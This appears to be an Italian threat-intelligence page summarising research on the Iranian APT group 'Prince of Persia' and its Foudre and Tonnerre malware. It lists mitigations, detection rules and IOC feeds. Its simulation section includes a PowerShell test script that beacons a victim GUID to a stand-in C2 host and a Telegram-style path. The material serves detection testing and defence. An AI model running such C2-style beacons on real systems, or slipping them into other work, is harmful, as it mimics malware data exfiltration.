Prince of Persia: Una Retrospettiva di 10 anni sulle Attività degli APT Iranian
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Il rapporto profila il cluster APT iraniano legato allo stato soprannominato Prince of Persia e traccia la sua progressione nell’ultimo decennio, con enfasi sull’attività osservata dal 2023 al 2025. Gli operatori si affidano a famiglie di malware su misura, tra cui Foudre, Tonnerre, MaxPinner, Rugissement e Deep Freeze, per supportare lo spionaggio e il furto sistematico di dati. Le versioni recenti introducono algoritmi di generazione di domini, command and control basato su Telegram e payload crittografati in SFX per migliorare la resilienza e il mascheramento. Gli obiettivi spaziano dalle infrastrutture critiche alle reti collegate a dissidenti in diverse regioni.
Indagine
I ricercatori di SafeBreach hanno seguito le operazioni del gruppo dal 2019 in avanti, raccogliendo nuovi campioni, documentando l’architettura C2 e analizzando la logica DGA. Hanno decrittografato i payload protetti, estratto credenziali di bot Telegram e costruito una cronologia dei rilasci delle varianti. La ricerca evidenzia infrastrutture di produzione e test separate e dettaglia comportamenti di file-drop legati a catene d’infezione guidate da Excel. Gli indicatori di compromissione sono stati assemblati a partire da hash di malware, domini e URL.
Mitigazione
Monitora l’attività DNS per i pattern di DGA identificati, blocca i domini malevoli noti e restringi o ispeziona il traffico relativo ai bot Telegram. Aggiungi rilevazioni per i nomi di file di malware menzionati e gli artefatti dei loader DLL, e usa il monitoraggio/sinkholing DNS per esporre l’infrastruttura in rotazione. Implementa la lista di applicazioni consentite e rinforza la sicurezza di Office limitando le macro per ridurre la probabilità di accesso iniziale.
Risposta
Se si trova un indicatore, metti in quarantena il sistema interessato, cattura le evidenze volatili ed esegui analisi mirate sui file scaricati e sui percorsi di registro rilevanti. Blocca tutti i domini e gli indirizzi IP collegati, ruota i token dei bot Telegram esposti e reimposta le credenziali per gli account impattati. Cerca in tutto l’ambiente i resti dei loader DLL personalizzati e dei payload crittografati SFX per garantire un’eradicazione completa.
Flusso di Attacco
Rilevazioni
Possibile abuso di Telegram come canale di Comando e Controllo (via dns_query)
Visualizza
Possibile infiltrazione/esfiltrazione dati/C2 tramite servizi/strumenti di terze parti (via proxy)
Visualizza
Comando e controllo sospetto tramite richiesta DNS con dominio di alto livello (TLD) insolito (via dns)
Visualizza
Esecuzione sospetta di Taskkill (via cmdline)
Visualizza
IOC (HashSha256) da rilevare: 18 DIC 2025 Prince of Persia: Un decennio di attività APT dello stato-nazione iraniano al microscopio Parte 2
Visualizza
IOC (SourceIP) da rilevare: 18 DIC 2025 Prince of Persia: Un decennio di attività APT dello stato-nazione iraniano al microscopio
Visualizza
IOC (HashSha256) da rilevare: 18 DIC 2025 Prince of Persia: Un decennio di attività APT dello stato-nazione iraniano al microscopio Parte 1
Visualizza
IOC (HashMd5) da rilevare: 18 DIC 2025 Prince of Persia: Un decennio di attività APT dello stato-nazione iraniano al microscopio
Visualizza
IOC (DestinationIP) da rilevare: 18 DIC 2025 Prince of Persia: Un decennio di attività APT dello stato-nazione iraniano al microscopio
Visualizza
Rilevazione di infezione Foudre v34 tramite file Excel con eseguibile incorporato [Creazione di Processo Windows]
Visualizza
Rilevazione di comunicazione C2 di Foudre e Tonnerre [Connessione di Rete Windows]
Visualizza
Esecuzione Simulazione
Prerequisito: Il controllo pre-volo della Telemetria e Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (T1584.005) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTPs identificate e mirare a generare l’esatta telemetria attesa dalla logica di rilevamento.
-
Narrazione e Comandi dell’Attacco:
L’attore della minaccia ha fornito un dominio malevolomalicious-c2.exampleche ospita il server C2 di Foudre/Tonnerre. Il payload dell’attaccante sulla macchina della vittima esegue due richieste HTTP GET:- Invia il GUID della vittima al punto finale Foudre C2 utilizzando il percorso
/1/?c=<GUID>. - Contatta l’API di Telegram tramite il back-door di Tonnerre usando il percorso
/t/tga.adr.
Entrambe le richieste vengono effettuate tramite HTTP (per semplificare la registrazione del proxy) e includono un generico User-Agent per integrarsi con il traffico normale. Le azioni generano i campi esatti (
request_method=GET,urlcontenenti le sottostringhe mirate) che la regola Sigma osserva. - Invia il GUID della vittima al punto finale Foudre C2 utilizzando il percorso
-
Script di Test di Regressione:
# ------------------------------------------------------------ # Simulazione Comunicazione C2 Foudre & Tonnerre (Windows) # ------------------------------------------------------------ # 1. Definire GUID della vittima (in una vera infezione sarebbe letto dal registro) $guid = (New-Guid).Guid # 2. Definire host C2 malevolo (sostituire con un indirizzo che si controlla per testare) $c2Host = "http://malicious-c2.example" # 3. Invia GUID al punto finale Foudre C2 $foudreUrl = "$c2Host/1/?c=$guid" Write-Host "[*] Inviando GUID a Foudre C2: $foudreUrl" Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing # 4. Contattare l'API di Telegram tramite il back-door di Tonnerre $telegramUrl = "$c2Host/t/tga.adr" Write-Host "[*] Contattando endpoint API di Telegram: $telegramUrl" Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing Write-Host "[+] Simulazione completa. Controllare SIEM per gli avvisi."Lo script è autonomo; eseguirlo su un host Windows che instrada il traffico tramite il proxy configurato produrrà due voci di log che corrispondono alla regola Sigma
url|containscondizioni. -
Comandi di Pulizia:
# Rimuovi eventuali connessioni di rete temporanee (solo rilevanti se il proxy crea sessioni persistenti) # Qui semplicemente svuotiamo la cache DNS per evitare la risoluzione residua dell'host malevolo. ipconfig /flushdns Write-Host "[*] Pulizia completa."